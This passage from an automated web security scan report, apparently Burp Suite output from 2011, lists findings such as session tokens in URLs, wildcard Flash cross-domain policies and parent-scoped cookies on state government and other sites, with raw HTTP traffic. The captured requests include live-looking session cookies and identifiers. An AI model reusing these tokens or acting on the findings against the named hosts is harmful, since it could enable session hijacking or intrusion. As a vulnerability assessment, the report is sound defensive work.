Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89a2............,...........L.;

4.3. http://www.delaware.gov/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.delaware.gov
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<meta name="verify-v1" content="thP3VfXQ653dVrb9ExI9XqvyNnfVO9/R4FszK
...[SNIP]...
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Corporations</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Corp_Info&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Revenue</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Rev_BIT&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">General Questions &amp; Help</a></strong> - M-F: 8:30 to 4:30 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;byhref=1&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&amp;file=visitorWantsToChat&amp;site=33511087&amp;SESSIONVAR!skill=Portal_Help&amp;imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/&amp;referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a>
...[SNIP]...

4.4. http://www.njleg.state.nj.us/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.njleg.state.nj.us
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:50:00 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=EHFKMCHBKABALIEPADMHHJAI; path=/
Cache-control: private


<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...
<font face="Arial, Helvetica, sans-serif" size="1"> <a href="media/archive_audio.asp?SESSION=2010"><b>
...[SNIP]...

4.5. http://www.njleg.state.nj.us/Default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.njleg.state.nj.us
Path:   /Default.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /Default.asp HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 13 Jul 2011 01:49:59 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 86262
Content-Type: text/html
Expires: Tue, 12 Jul 2011 09:10:00 GMT
Set-Cookie: ASPSESSIONIDAADDSACS=BHFKMCHBAILGMCBNDLEBOAHM; path=/
Cache-control: private


<html>
<head>
<style type="text/css">
<!--

A.blk:link {color: #000000; text-decoration: none;}
A.blk:visited {color: #000000; text-decoration: none;}
A.blk:active {color: #910000; text-d
...[SNIP]...
<font face="Arial, Helvetica, sans-serif" size="1"> <a href="media/archive_audio.asp?SESSION=2010"><b>
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://nj.gov/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nj.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nj.gov

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:38:25 GMT
Content-length: 333
Content-type: text/xml
Last-modified: Thu, 11 Mar 2010 19:28:31 GMT
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.state.nj.us -->
<cross-domain-policy>
<allow-access-from domain="*.state.nj.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.nj.gov" secure="true" />
...[SNIP]...

5.2. http://www.state.nj.us/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.state.nj.us

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:40:36 GMT
Content-length: 333
Content-type: text/xml
Last-modified: Thu, 11 Mar 2010 19:28:31 GMT
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.state.nj.us -->
<cross-domain-policy>
<allow-access-from domain="*.state.nj.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.nj.gov" secure="true" />
...[SNIP]...

6. Cookie scoped to parent domain  previous  next
There are 21 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


6.1. http://www.cio.ny.gov/universal_broadband  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cio.ny.gov
Path:   /universal_broadband

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /universal_broadband HTTP/1.1
Host: www.cio.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS6ae10ccb72afca1d3adad0f3130a2f0b=cggsua31kb710f7fs301ku2ui4; expires=Fri, 05-Aug-2011 05:24:42 GMT; path=/; domain=.cio.ny.gov
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:22 GMT
Cache-Control: must-revalidate
Connection: close
Content-Length: 34252
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<met
...[SNIP]...

6.2. http://www.opensource.org/licenses/gpl-3.0.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-3.0.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-3.0.html HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:16 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ptef1q92e6ahqi733m5ck1hu30; expires=Fri, 05-Aug-2011 05:23:36 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:46 GMT
ETag: "e73d99926e74ae2d28e0d29f4e2b995f"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.3. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:15 GMT
Server: Apache/2.2.19 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ga7kus4qs2c78hilc93rk8sjc2; expires=Fri, 05-Aug-2011 05:23:35 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 13 Jul 2011 01:46:29 GMT
ETag: "e3748fe2bbaca53c3b673355a01e8f37"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.4. http://www.visitnj.org/events  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitnj.org
Path:   /events

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:26 GMT
ETag: "1c02c8d04dbc4f40ed09302c3263264b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...

6.5. http://www.visitnj.org/new-jerseys-wineries  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitnj.org
Path:   /new-jerseys-wineries

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 22:00:07 GMT
ETag: "fcfdc2bb205847c6a67cce0b8add1bc2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42712

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;"><tr><th colspan="2"> Database Error</th></tr>
<tr><td align="right" valign="top">Message:</td><td>[<b>M
...[SNIP]...

6.6. http://ads.doclix.com/adserver/serve/js/banner_unit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/banner_unit.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/serve/js/banner_unit.jsp?pid=16609&codeId=2351&cnt=1&width=728&height=90&pageId=66798966&refUrl=http%3A//soris.us/&ref= HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=YmFubmVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 38237
Connection: close


<!DOCTYPE HTML>
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>AdSide: Sponsored Links</title>
       <script src="doclix_lib.js" type="text/javascri
...[SNIP]...

6.7. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/pop_under_unit.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/serve/js/pop_under_unit.jsp?pid=16609&codeId=3794&refUrl=http%3A//soris.us/&ref= HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 17041
Connection: close

<!DOCTYPE HTML>
<html>
       <head>
                       
           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>AdSide: Sponsored Links</title>
           <script src="doclix_lib.js" type="tex
...[SNIP]...

6.8. http://id.google.com/verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAO3u2e0fEjERBbAuho_q-WM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=soris
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=NeqCa76J_YVQvK2LRrkDwCqnvpZukiycSVuP9dW3=5oNHLt4ofQjLAHFr; expires=Thu, 12-Jan-2012 11:39:23 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 13 Jul 2011 11:39:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

6.9. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D3%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=546
Expires: Wed, 13 Jul 2011 02:08:44 GMT
Date: Wed, 13 Jul 2011 01:59:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=0UnL/zxOv1wWLvbsWR94vThVNFRL+VrVChrGyouncnHM3RJMc0OunWy9Iw1KYllglK6BzBYmmP70PPXySvjQrQRr7GhCttd/4huailsTJ8NIePwbCOJO2s7gpkApsymcrQnuHMcKstsMu0BAp1qc7xTgnAIN4iuUF5uw2M1rmo/cllWpet7twXmFAr3zg+2zFmCpTKJ/akdqFozM2Gjavk0dnS0dTqHcwjhvleYzL+SBU6hOq7l+aI8afJDgyTfi7XAB/bP9nrhTwK/nD4N6oH+g6IXrGspDRaXHbWEnya2CdRbitwUAtHcIjU1Uy5SR3pQDqqo7XI+jv41vcgvf0vRB4oKWRzS/hHLY0NCMW04UQMf2u2g9SSm5FZWpIpUI58iDq78i5bp7fZPd4Et8ZmFkCYxUkLx42YrXu0T9nOJyJl07nB844YaoEMKgvSvUPM2ss+jIv8YjICsWlytE2sSVlw0DBNEA9uL1Pe1k1m41bpjryqDOi8vgtW4HelOL1Hum8RiUvIoGMlmherfTe6RUfzSCpPmpK/MxiAMWnGtjVcb/o4TlyMiqxsde+eBU; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


6.10. http://images.apple.com/ipod/images/gradient_texture20100901.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipod/images/gradient_texture20100901.jpg HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
